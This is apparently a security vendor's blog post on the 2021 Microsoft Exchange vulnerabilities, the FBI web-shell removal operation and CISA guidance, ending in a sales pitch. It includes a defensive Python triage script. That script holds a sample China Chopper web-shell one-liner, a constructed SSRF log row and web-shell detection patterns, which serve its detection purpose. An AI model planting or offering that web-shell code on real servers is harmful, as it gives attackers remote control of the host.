Learn about Microsoft Exchange vulnerabilities and what this could mean for your organization, how you should respond, and government implications.

Mar 12, 2022

Countering Microsoft Exchange Vulnerabilities: DOJ Authorizes Warrant to Address Cybercrime Against Americans

Federal Government Moving Quickly to Respond to Emerging Threats to Vital Digital Infrastructure

On Tuesday, April 13th, 2021, Microsoft released a set of Exchange Server security updates after the United States National Security Agency (NSA) reported new vulnerabilities to Microsoft that posed unique cyber risks to American assets and digital infrastructure. The flaws affect on-premises Microsoft Exchange Server, allow remote code execution, and open the door to a wide range of malicious follow-on activity against compromised computers and networks. On the same day, the United States Department of Justice (DOJ) announced a court-authorized operation, carried out by the Federal Bureau of Investigation (FBI), to remotely access "hundreds of vulnerable computers in the United States running on-premises versions of Microsoft Exchange Server software used to provide enterprise-level email service" and remove the "malicious web shells" that earlier intrusions had left behind. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) also acted on April 12th, adding two Malware Analysis Reports (MARs) to Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities:
  •  MAR-10331466-1.v1: China Chopper Webshell describes a China Chopper web shell observed on Microsoft Exchange servers after compromise. Once a malicious cyber actor has exploited an Exchange Server vulnerability for initial access, the actor can upload a web shell to gain remote administration of the affected system.
  •  MAR-10330097-1.v1: DearCry Ransomware describes ransomware deployed on compromised on-premises Exchange servers. The malware encrypts files on the device and demands a ransom in exchange for decryption.
CISA explained why it treats these servers as an emergency: "Given the powerful privileges that Exchange manages by default and the amount of potentially sensitive information that is stored in Exchange servers operated and hosted by (or on behalf of) federal agencies, Exchange servers are a primary target for adversary activity," CISA wrote. "This determination is based on the likelihood of the vulnerabilities being weaponized, combined with the widespread use of the affected software across the Executive Branch and high potential for a compromise of integrity and confidentiality of agency information." This article covers what you need to know about the ongoing cyber threat posed by the recently discovered Microsoft Exchange vulnerabilities and offers actionable insight into how best to mitigate them.

The 2021 Microsoft Exchange Vulnerabilities: What Happened and Why It Matters For Your Organization

Microsoft Exchange Server vulnerabilities have been a major cybersecurity topic since the security firm Volexity detected anomalous and potentially malicious activity on two of its customers' Microsoft Exchange servers on January 3rd, 2021. On March 2nd, 2021, Microsoft confirmed that zero-day exploits were being used against on-premises Exchange servers in the United States. By March 9th, 2021, more than 250,000 organizations were reported to have been targeted in the wave of exploitation that followed the vulnerabilities first observed in January. In March, Microsoft published Exchange vulnerability mitigation guidance and released a one-click mitigation tool. After the initial intrusions, state-linked and criminal groups including HAFNIUM, Winnti Group, Calypso, Tick, and LuckyMouse (APT27) seized the moment to deploy a series of crimeware variants, including previously unknown ransomware families. Victims were not limited to private companies; they included public bodies such as the European Banking Authority, the Norwegian Parliament, and the Chilean Commission for Financial Markets (CMF). The most recent Exchange vulnerabilities were reported by the NSA and triaged by CISA, while the DOJ-obtained warrant and the FBI operation removed web shells left behind by exploitation of the earlier flaws. Unlike CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, the new vulnerabilities had not yet been exploited by advanced persistent threat (APT) actors; that the federal government nonetheless acted at this scale signals how serious a threat these new exploit vectors posed to U.S. national interests.
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General John C. Demers for the Justice Department’s National Security Division. “Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity. There’s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.”

How Should Organizations Respond to the 2021 Microsoft Exchange Data Breach and Vulnerabilities?

Any organization that runs on-premises Microsoft Exchange servers should apply the security updates immediately, both for the vulnerabilities first observed in January and patched in March and for those reported by the NSA in April. Although the NSA-reported vulnerabilities had not been used in observed exploitation attempts at the time of disclosure, the earlier flaws were exploited at scale, and an unpatched server remains a target. Organizations seeking more information about the ongoing and evolving event should review the following resources:
  •  Microsoft April 2021 Security Update Summary and deployment information
  •  CISA ED 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities, Supplemental Direction V2
  •  CISA Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
  •  CISA web page: Remediating Microsoft Exchange Vulnerabilities
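Patching closes the door, but it does not tell you whether an attacker already walked through it. As an added example (not code from the original page, from Microsoft, or from CISA), the following Python script performs two checks a responder would run on an on-premises Exchange host: Microsoft's published HttpProxy-log hunting query for the CVE-2021-26855 server-side request forgery indicator, and a content scan of .aspx files for the China Chopper one-liner described in MAR-10331466-1.v1. The log excerpt and the .aspx samples are constructed for this example, and the Exchange install paths are assumed defaults.

```python
"""Post-exploitation triage for an on-premises Exchange server (example code).

Two checks drawn from Microsoft's and CISA's March 2021 hunting guidance:
  1. HttpProxy logs: unauthenticated requests whose AnchorMailbox matches the
     glob 'ServerInfo~*/*', the indicator Microsoft published for CVE-2021-26855.
  2. .aspx files under Exchange's web roots whose content matches the China
     Chopper one-liner (eval of a request parameter) from MAR-10331466-1.v1.
All sample data below is constructed for this example; install paths are assumptions.
"""
import csv
import fnmatch
import io
import re
from pathlib import Path

# Constructed HttpProxy log excerpt. Exchange writes these logs as CSV with a header
# row; DateTime, AuthenticatedUser, AnchorMailbox and ClientIpAddress are genuine
# column names, other columns are trimmed for brevity. Row r2 mimics the SSRF shape:
# no authenticated user, and an AnchorMailbox steering the front end at a backend path.
SAMPLE_HTTPPROXY_LOG = r"""DateTime,RequestId,AuthenticatedUser,AnchorMailbox,ClientIpAddress,UrlStem,HttpStatus
2021-03-03T04:12:09.123Z,r1,CORP\alice,alice@corp.example,10.0.0.5,/owa/,200
2021-03-03T04:12:31.456Z,r2,,ServerInfo~a]@exch01.corp.example:444/autodiscover/autodiscover.xml?#,203.0.113.7,/ecp/y.js,200
2021-03-03T04:13:02.789Z,r3,,Exchange@corp.example,10.0.0.9,/autodiscover/autodiscover.xml,401
"""

# Constructed .aspx samples: a China Chopper JScript one-liner and a benign page.
SAMPLE_CHINA_CHOPPER = '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>'
SAMPLE_BENIGN_PAGE = '<%@ Page Language="C#" AutoEventWireup="true" %><html><body>Sign in</body></html>'

# Assumed default install locations named in Microsoft's March 2021 web-shell guidance.
EXCHANGE_WEB_DIRS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\inetpub\wwwroot\aspnet_client",
]

# China Chopper ASPX hands a request parameter straight to eval(); match that shape
# whichever request collection the operator used. Deliberately narrow: a miss here does
# not mean a file is clean, so pair this with a baseline of known-good file hashes.
WEBSHELL_PATTERNS = [
    re.compile(r'eval\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*\[', re.IGNORECASE),
    re.compile(r'Process\.Start\s*\([^)]*Request', re.IGNORECASE),
]


def find_ssrf_indicators(log_text):
    """Apply Microsoft's hunting query to HttpProxy CSV text.

    Returns one dict per suspicious row: an unauthenticated request whose
    AnchorMailbox matches the glob 'ServerInfo~*/*'.
    """
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        anchor = row.get("AnchorMailbox") or ""
        if not row.get("AuthenticatedUser") and fnmatch.fnmatchcase(anchor, "ServerInfo~*/*"):
            hits.append({"time": row["DateTime"], "client_ip": row["ClientIpAddress"], "anchor": anchor})
    return hits


def looks_like_webshell(content):
    """True if the page source matches any of the web-shell patterns."""
    return any(p.search(content) for p in WEBSHELL_PATTERNS)


def scan_for_webshells(root):
    """Walk a directory tree and return paths of .aspx files that look like web shells."""
    hits = []
    for path in Path(root).rglob("*.aspx"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable; skip here, but an unreadable file in owa\auth deserves a look
        if looks_like_webshell(text):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for hit in find_ssrf_indicators(SAMPLE_HTTPPROXY_LOG):
        print("possible CVE-2021-26855 SSRF:", hit)
    print("sample China Chopper flagged:", looks_like_webshell(SAMPLE_CHINA_CHOPPER))
    for d in EXCHANGE_WEB_DIRS:  # only finds anything when run on an Exchange host
        if not Path(d).is_dir():
            continue
        for p in scan_for_webshells(d):
            print("possible web shell:", p)
```

On a real host, point find_ssrf_indicators at the contents of each file under the Exchange Logging\HttpProxy directory and scan_for_webshells at the two directories listed (plus any custom install path). A hit from either check means the server should be treated as compromised and handled by incident response, not just patched.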

Geopolitical Implications of Government Actions Against Microsoft Exchange Vulnerabilities

This latest cyber threat event involving Microsoft Exchange has a variety of geopolitical implications, because many of the actors linked to ongoing exploitation attempts have been tied to threat groups based in Russia and China, among other nations with adversarial relationships to U.S. national interests. The Computer Crime and Intellectual Property Section of the United States Department of Justice has been very active over the last few years and has taken many actions toward prosecuting foreign nationals involved in cybercrime against the United States. Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger released the following statement outlining the U.S. government's commitment to countering cyberespionage and cyberwarfare directed at U.S. citizens:

"Cybersecurity is a top priority for the Biden Administration, and we're committed to sharing actionable and timely information to help the American public operate safely online. Microsoft released a set of Exchange patches today that are critical. We urge all owners and operators of Microsoft Exchange Servers to apply these latest patches immediately. The U.S. Government will lead by example – we require all agencies to patch their Exchange servers immediately. Should these vulnerabilities evolve into a major incident, we will manage the incident in partnership with the private sector, building on the Unified Coordination Group processes established and exercised in the recent Microsoft Exchange incident. The U.S. government discovered and notified Microsoft of these vulnerabilities. The U.S. Government carefully weighs the national security, public, and commercial interests in deciding to disclose a vulnerability. Moreover, we recognize when vulnerabilities may pose such a systemic risk that they require expedited disclosure. This disclosure is an example of the responsible and transparent approach the U.S. government uses when handling vulnerabilities. This is consistent with our expectations for how responsible governments and companies can work together to promote cybersecurity."

Coordination is Key to Developing a Resilient Cybersecurity Posture

Protecting mission-critical digital infrastructure has far-reaching implications. In light of recent data breaches, ransomware attacks, and ongoing exploitation attempts against public and private sector organizations, it is clear that organizations worldwide need to adopt a more resilient cybersecurity posture. Building agile and responsive threat response capabilities means developing partnerships with expert analysts and proprietary technologies that go further and see farther. Gradient is your trusted cybersecurity partner. Our platform is your best resource for understanding and responding to the emerging cyber threats of the day, backed by the expertise of seasoned information security professionals. Our team of analysts and cybersecurity professionals becomes an extension of your IT capabilities and the foundation of a resilient and responsive cybersecurity posture. Don't wait until it's too late and your organization is targeted. Respond to emerging threats now. Schedule a demo today to learn more about the next generation of cybersecurity.